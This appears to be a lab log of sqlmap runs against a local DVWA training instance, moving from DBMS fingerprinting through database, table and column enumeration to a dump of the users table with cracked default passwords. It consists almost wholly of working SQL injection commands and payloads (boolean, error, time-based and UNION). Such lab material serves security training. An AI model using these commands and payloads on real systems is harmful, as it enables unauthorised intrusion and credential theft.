************************************
*** what type of database-server ***
************************************
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lpmkv3jih7chc14mf9186bdni5"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:40:54

[19:40:54] [INFO] resuming back-end DBMS 'mysql' 
[19:40:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1796=1796#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706a71,(SELECT (ELT(1864=1864,1))),0x7171787871,0x78))s), 8446744073709551610, 8446744073709551610)))-- ugXa&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- qcGw&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171706a71,0x44447643684a666b4a507054646a5a6f62624b49574f735866475755534f76644c71644a6d496375,0x7171787871),NULL#&Submit=Submit
---
[19:40:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:40:54] [INFO] fetched data logged to text files under '/home/hofmann/.sqlmap/output/localhost'

[*] shutting down at 19:40:54

********************
*** Find DB name ***
********************
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lpmkv3jih7chc14mf9186bdni5" --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:41:02

[19:41:02] [INFO] resuming back-end DBMS 'mysql' 
[19:41:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1796=1796#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706a71,(SELECT (ELT(1864=1864,1))),0x7171787871,0x78))s), 8446744073709551610, 8446744073709551610)))-- ugXa&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- qcGw&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171706a71,0x44447643684a666b4a507054646a5a6f62624b49574f735866475755534f76644c71644a6d496375,0x7171787871),NULL#&Submit=Submit
---
[19:41:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:41:02] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema

[19:41:02] [INFO] fetched data logged to text files under '/home/hofmann/.sqlmap/output/localhost'

[*] shutting down at 19:41:02

********************
*** Find TABLES  ***
********************
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lpmkv3jih7chc14mf9186bdni5" -D dvwa --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:41:07

[19:41:07] [INFO] resuming back-end DBMS 'mysql' 
[19:41:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1796=1796#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706a71,(SELECT (ELT(1864=1864,1))),0x7171787871,0x78))s), 8446744073709551610, 8446744073709551610)))-- ugXa&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- qcGw&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171706a71,0x44447643684a666b4a507054646a5a6f62624b49574f735866475755534f76644c71644a6d496375,0x7171787871),NULL#&Submit=Submit
---
[19:41:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:41:07] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[19:41:07] [INFO] fetched data logged to text files under '/home/hofmann/.sqlmap/output/localhost'

[*] shutting down at 19:41:07

**************************
*** Find COLUMN names  ***
**************************
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lpmkv3jih7chc14mf9186bdni5" -D dvwa -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:41:13

[19:41:13] [INFO] resuming back-end DBMS 'mysql' 
[19:41:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1796=1796#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706a71,(SELECT (ELT(1864=1864,1))),0x7171787871,0x78))s), 8446744073709551610, 8446744073709551610)))-- ugXa&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- qcGw&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171706a71,0x44447643684a666b4a507054646a5a6f62624b49574f735866475755534f76644c71644a6d496375,0x7171787871),NULL#&Submit=Submit
---
[19:41:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:41:13] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[19:41:14] [INFO] fetched data logged to text files under '/home/hofmann/.sqlmap/output/localhost'

[*] shutting down at 19:41:13

******************************************
*** Find Username and password (dump)  ***
******************************************
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lpmkv3jih7chc14mf9186bdni5" -D dvwa -T users -C user,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:41:19

[19:41:19] [INFO] resuming back-end DBMS 'mysql' 
[19:41:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1796=1796#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706a71,(SELECT (ELT(1864=1864,1))),0x7171787871,0x78))s), 8446744073709551610, 8446744073709551610)))-- ugXa&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- qcGw&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171706a71,0x44447643684a666b4a507054646a5a6f62624b49574f735866475755534f76644c71644a6d496375,0x7171787871),NULL#&Submit=Submit
---
[19:41:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:41:19] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'
[19:41:20] [INFO] heuristics detected web page charset 'ascii'
[19:41:20] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[19:41:20] [INFO] the SQL query used returns 5 entries
[19:41:20] [INFO] resumed: "1337","8d3533d75ae2c3966d7e0d4fcc69216b"
[19:41:20] [INFO] resumed: "admin","5f4dcc3b5aa765d61d8327deb882cf99"
[19:41:20] [INFO] resumed: "gordonb","e99a18c428cb38d5f260853678922e03"
[19:41:20] [INFO] resumed: "pablo","0d107d09f5bbe40cade3de5c71e9e9b7"
[19:41:20] [INFO] resumed: "smithy","5f4dcc3b5aa765d61d8327deb882cf99"
[19:41:20] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [19:41:45] [INFO] using hash method 'md5_generic_passwd'
[19:41:45] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[19:41:45] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[19:41:45] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[19:41:45] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[19:41:45] [INFO] table 'dvwa.users' dumped to CSV file '/home/hofmann/.sqlmap/output/localhost/dump/dvwa/users.csv'
[19:41:45] [INFO] fetched data logged to text files under '/home/hofmann/.sqlmap/output/localhost'

[*] shutting down at 19:41:45

